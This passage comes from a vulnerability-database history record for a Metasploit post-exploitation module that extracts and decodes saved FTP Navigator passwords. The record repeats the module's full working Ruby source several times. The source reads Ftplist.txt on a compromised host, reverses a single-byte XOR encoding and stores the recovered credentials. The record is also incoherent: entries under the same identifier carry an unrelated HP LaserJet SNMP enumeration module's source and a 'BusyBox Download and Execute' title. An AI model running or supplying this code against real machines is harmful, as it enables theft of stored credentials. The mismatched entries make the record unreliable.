"MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "2290cd29214183c1cddd7f481ca983ea", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-04-29T00:47:50", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "kitploit", "idList": ["KITPLOIT:713763628505199617", "KITPLOIT:1970484045196480689", "KITPLOIT:4422912280922039253"]}, {"type": "zdt", "idList": ["1337DAY-ID-32604", "1337DAY-ID-32603", "1337DAY-ID-32600"]}, {"type": "cve", "idList": ["CVE-2019-11576", "CVE-2019-11220", "CVE-2019-9809", "CVE-2019-9801", "CVE-2019-9794"]}, {"type": "pentestit", "idList": ["PENTESTIT:0DC2B99B965A9B217A58DF8F23F27EBE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:152654", "PACKETSTORM:152645"]}, {"type": "threatpost", "idList": ["THREATPOST:DDB6E2767CFC8FF972505D4C12E6AB6B", "THREATPOST:142DAF150C2BF9EB70ECE95F46939532"]}, {"type": "krebs", "idList": ["KREBS:D06BB2ED80FC78A9E454F45E0A04688C"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:DF960CBD9C764BBC152744F203C9E4C1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:08F7CDCB6DB85933D5481B61F4DBD8EE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891764"]}], "modified": "2019-04-29T00:47:50"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/post/windows/gather/credentials/ftpnavigator.rb"}, "lastseen": "2019-04-29T00:47:50", "differentElements": ["description", "metasploitHistory", "metasploitReliability", "sourceHref"], "edition": 17}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-05-29T05:37:56", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:0237B225F3E6464DE138CB04BDC01224", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7", "THREATPOST:EEAB01DAA00B02E429A0E29A917DC883"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:7BF9FACF83637865DBCDC1ADA2BB3C7B", "MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808", "1337DAY-ID-32807", "1337DAY-ID-32803"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", "MYHACK58:62201994293"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153084"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891807", "OPENVAS:1361412562310891806"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443"]}, {"type": "ubuntu", "idList": ["USN-3976-4"]}], "modified": "2019-05-29T05:37:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-29T05:37:56", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 18}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "34e88ca419042ad5e5b5f74c9ce6e206", "type": "metasploit", "bulletinFamily": "exploit", "title": "HP LaserJet Printer SNMP Enumeration", "description": "This module allows enumeration of files previously printed. It provides details as filename, client, timestamp and username information. The default community used is \"public\".\n", "published": "2014-01-25T14:48:13", "modified": "2017-08-27T01:01:10", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": ["http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol", "http://net-snmp.sourceforge.net/docs/man/snmpwalk.html", "http://www.nothink.org/perl/snmpcheck/", "http://www.securiteam.com/securitynews/5AP0S2KGVS.html", "http://stuff.mit.edu/afs/athena/dept/cron/tools/share/mibs/290923.mib"], "cvelist": [], "lastseen": "2019-05-29T23:06:32", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:0237B225F3E6464DE138CB04BDC01224", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7", "THREATPOST:EEAB01DAA00B02E429A0E29A917DC883"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:7BF9FACF83637865DBCDC1ADA2BB3C7B", "MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808", "1337DAY-ID-32807", "1337DAY-ID-32803"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", "MYHACK58:62201994293"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153084"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891807", "OPENVAS:1361412562310891806"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443"]}, {"type": "ubuntu", "idList": ["USN-3976-4"]}], "modified": "2019-05-29T05:37:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/snmp/snmp_enum_hp_laserjet.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::SNMPClient\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'HP LaserJet Printer SNMP Enumeration',\n 'Description' => %q{\n This module allows enumeration of files previously printed.\n It provides details as filename, client, timestamp and username information.\n The default community used is \"public\".\n },\n 'References' =>\n [\n [ 'URL', 'http://en.wikipedia.org/wiki/Simple_Network_Management_Protocol' ],\n [ 'URL', 'http://net-snmp.sourceforge.net/docs/man/snmpwalk.html' ],\n [ 'URL', 'http://www.nothink.org/perl/snmpcheck/' ],\n [ 'URL', 'http://www.securiteam.com/securitynews/5AP0S2KGVS.html' ],\n [ 'URL', 'http://stuff.mit.edu/afs/athena/dept/cron/tools/share/mibs/290923.mib' ],\n ],\n 'Author' => 'Matteo Cantoni <goony[at]nothink.org>',\n 'License' => MSF_LICENSE\n ))\n end\n\n def run_host(ip)\n begin\n snmp = connect_snmp\n\n vprint_status(\"Connecting to #{ip}\")\n\n output_data = []\n\n output_data << \"IP address : #{ip}\"\n\n sysName = snmp.get_value('1.3.6.1.2.1.1.5.0').to_s\n output_data << \"Hostname : #{sysName.strip}\"\n\n sysDesc = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s\n sysDesc.gsub!(/^\\s+|\\s+$|\\n+|\\r+/, ' ')\n output_data << \"Description : #{sysDesc.strip}\"\n\n sysContact = snmp.get_value('1.3.6.1.2.1.1.4.0').to_s\n output_data << \"Contact : #{sysContact.strip}\" if not sysContact.empty?\n\n sysLocation = snmp.get_value('1.3.6.1.2.1.1.6.0').to_s\n output_data << \"Location : #{sysLocation.strip}\" if not sysLocation.empty?\n\n output_data << \"\"\n\n snmp.walk([\n \"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.1\", # job-info-name1 - document name1\n \"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.2\", # job-info-name2 - document name2\n \"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.1\", # job-info-attr-1 - username\n \"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.2\", # job-info-attr-2 - machine name\n \"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.3\", # job-info-attr-3 - domain (?)\n \"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.4\", # job-info-attr-4 - timestamp\n \"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.6\", # job-info-attr-6 - application name\n \"1.3.6.1.4.1.11.2.3.9.4.2.1.1.6.5.23.7\", # job-info-attr-7 - application command\n ]) do |name1,name2,username,client,domain,timestamp,app_name,app_command|\n\n filename = name1.value.to_s + name2.value.to_s\n\n if (username.value.to_s !~ /noSuchInstance/)\n if username.value.to_s =~ /^JobAcct(\\d+)=(.*)/\n username = $2\n end\n else\n username = ''\n end\n\n if (client.value.to_s !~ /noSuchInstance/)\n if client.value.to_s =~ /^JobAcct(\\d+)=(.*)/\n client = $2\n end\n else\n client = ''\n end\n\n if (domain.value.to_s !~ /noSuchInstance/)\n if domain.value.to_s =~ /^JobAcct(\\d+)=(.*)/\n domain = $2\n end\n else\n domain = ''\n end\n\n if (timestamp.value.to_s !~ /noSuchInstance/)\n if timestamp.value.to_s =~ /^JobAcct(\\d+)=(.*)/\n timestamp = $2\n end\n else\n timestamp = ''\n end\n\n if (app_name.value.to_s !~ /noSuchInstance/)\n if app_name.value.to_s =~ /^JobAcct(\\d+)=(.*)/\n app_name = $2\n end\n else\n app_name = ''\n end\n\n if (app_command.value.to_s !~ /noSuchInstance/)\n if app_command.value.to_s =~ /^JobAcct(\\d+)=(.*)/\n app_command = $2\n end\n else\n app_command = ''\n end\n\n if not timestamp.empty?\n output_data << \"File name : #{filename}\"\n output_data << \"Username : #{username}\" if not username.empty?\n output_data << \"Client : #{client}\" if not client.empty?\n output_data << \"Domain : #{domain}\" if not domain.empty?\n output_data << \"Timestamp : #{timestamp}\" if not timestamp.empty?\n output_data << \"Application : #{app_name} (#{app_command})\" if not app_name.empty?\n output_data << \"\"\n end\n end\n\n output_data.each do |row|\n print_good(\"#{row}\")\n end\n\n disconnect_snmp\n\n rescue SNMP::RequestTimeout\n print_error(\"#{ip}, SNMP request timeout.\")\n rescue Errno::ECONNREFUSED\n print_error(\"#{ip}, Connection refused.\")\n rescue SNMP::InvalidIpAddress\n print_error(\"#{ip}, Invalid IP Address. Check it with 'snmpwalk tool'.\")\n rescue ::Interrupt\n raise $!\n rescue ::Exception => e\n print_error(\"#{ip}, Unknown error: #{e.class} #{e}\")\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-29T23:06:32", "differentElements": ["description", "modified", "published", "references", "sourceData", "sourceHref", "title"], "edition": 19}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-05-30T16:39:54", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:0237B225F3E6464DE138CB04BDC01224", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7", "THREATPOST:EEAB01DAA00B02E429A0E29A917DC883"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:7BF9FACF83637865DBCDC1ADA2BB3C7B", "MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808", "1337DAY-ID-32807", "1337DAY-ID-32803"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", "MYHACK58:62201994293"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153084"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891807", "OPENVAS:1361412562310891806"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443"]}, {"type": "ubuntu", "idList": ["USN-3976-4"]}], "modified": "2019-05-29T05:37:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-05-30T16:39:54", "differentElements": ["sourceData"], "edition": 20}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "66445928f8c96e92ff3800c6ff29b8ae", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-03T15:21:47", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:0237B225F3E6464DE138CB04BDC01224", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7", "THREATPOST:EEAB01DAA00B02E429A0E29A917DC883"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:7BF9FACF83637865DBCDC1ADA2BB3C7B", "MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808", "1337DAY-ID-32807", "1337DAY-ID-32803"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", "MYHACK58:62201994293"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153084"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891807", "OPENVAS:1361412562310891806"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443"]}, {"type": "ubuntu", "idList": ["USN-3976-4"]}], "modified": "2019-05-29T05:37:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-03T15:21:47", "differentElements": ["sourceData"], "edition": 21}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "cea99839da918f871ed4b868024dff89", "type": "metasploit", "bulletinFamily": "exploit", "title": "Windows Gather FTP Navigator Saved Password Extraction", "description": "This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.\n", "published": "2011-10-11T05:45:03", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-04T16:15:09", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:0237B225F3E6464DE138CB04BDC01224", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7", "THREATPOST:EEAB01DAA00B02E429A0E29A917DC883"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:7BF9FACF83637865DBCDC1ADA2BB3C7B", "MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808", "1337DAY-ID-32807", "1337DAY-ID-32803"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", "MYHACK58:62201994293"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:153084"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310891807", "OPENVAS:1361412562310891806"]}, {"type": "kitploit", "idList": ["KITPLOIT:6667106287137702443"]}, {"type": "ubuntu", "idList": ["USN-3976-4"]}], "modified": "2019-05-29T05:37:56"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/windows/gather/credentials/ftpnavigator.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'msf/core/auxiliary/report'\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::Windows::Registry\n include Msf::Auxiliary::Report\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Windows Gather FTP Navigator Saved Password Extraction',\n 'Description' => %q{\n This module extracts saved passwords from the FTP Navigator FTP client.\n It will decode the saved passwords and store them in the database.\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['theLightCosine'],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ]\n ))\n end\n\n def run\n key = \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Uninstall\\\\FTP Navigator_is1\\\\\"\n val_name = \"InstallLocation\"\n installdir = registry_getvaldata(key, val_name) || \"c:\\\\FTP Navigator\\\\\"\n\n path = \"#{installdir}Ftplist.txt\"\n\n begin\n ftplist = client.fs.file.new(path,'r')\n rescue Rex::Post::Meterpreter::RequestError => e\n print_error(\"Unable to open Ftplist.txt: #{e}\")\n print_error(\"FTP Navigator May not Ne Installed\")\n return\n end\n\n lines = ftplist.read.split(\"\\n\")\n lines.each do |line|\n next if line.include? \"Anonymous=1\"\n next unless line.include? \";Password=\"\n\n dpass = \"\"\n username = \"\"\n server = \"\"\n port = \"\"\n\n line.split(\";\").each do |field|\n next if field.include? \"SavePassword\"\n\n if field.include? \"Password=\"\n epass = split_values(field)\n dpass = decode_pass(epass)\n elsif field.include? \"User=\"\n username = split_values(field)\n elsif field.include? \"Server=\"\n server = split_values(field)\n elsif field.include? \"Port=\"\n port = split_values(field)\n end\n end\n\n print_good(\"Host: #{server} Port: #{port} User: #{username} Pass: #{dpass}\")\n service_data = {\n address: Rex::Socket.getaddress(server),\n port: port,\n protocol: \"tcp\",\n service_name: \"ftp\",\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n origin_type: :session,\n session_id: session_db_id,\n post_reference_name: self.refname,\n username: username,\n private_data: dpass,\n private_type: :password\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n access_level: \"User\",\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n end\n\n def split_values(field)\n values = field.split(\"=\",2)\n return values[1]\n end\n\n def decode_pass(encoded)\n decoded = \"\"\n encoded.unpack(\"C*\").each do |achar|\n decoded << (achar ^ 0x19)\n end\n return decoded\n end\nend\n", "metasploitReliability": "", "metasploitHistory": ""}, "lastseen": "2019-06-04T16:15:09", "differentElements": ["description", "published", "sourceData", "sourceHref", "title"], "edition": 22}, {"bulletin": {"id": "MSF:POST/WINDOWS/GATHER/CREDENTIALS/FTPNAVIGATOR", "hash": "8aa342d32297d9773a014770593781fd", "type": "metasploit", "bulletinFamily": "exploit", "title": "BusyBox Download and Execute", "description": "This module will be applied on a session connected to a BusyBox shell. It will use wget to download and execute a file from the device running BusyBox.\n", "published": "2015-08-28T14:17:23", "modified": "2017-07-24T13:26:21", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": [], "lastseen": "2019-06-10T23:08:32", "history": [], "viewCount": 14, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "dependencies": {"references": [{"type": "threatpost", "idList": ["THREATPOST:0237B225F3E6464DE138CB04BDC01224", "THREATPOST:4F23E34A058045723339C103BC41A3D1", "THREATPOST:F6D4B188E04BD6EE071252F8086376C7", "THREATPOST:EEAB01DAA00B02E429A0E29A917DC883"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:7BF9FACF83637865DBCDC1ADA2BB3C7B", "MALWAREBYTES:25B3F0207E83D3A1AB42C2618C81343D"]}, {"type": "thn", "idList": ["THN:3D0ED27488E8AFC91D99882663F7E35A"]}, {"type": "exploitdb", "idList": ["EDB-ID:46934", "EDB-ID:46930"]}, {"type": "zdt", "idList": ["1337DAY-ID-32806", "1337DAY-ID-32808", "1337DAY-ID-32807", "1337DAY-ID-32803"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994299", 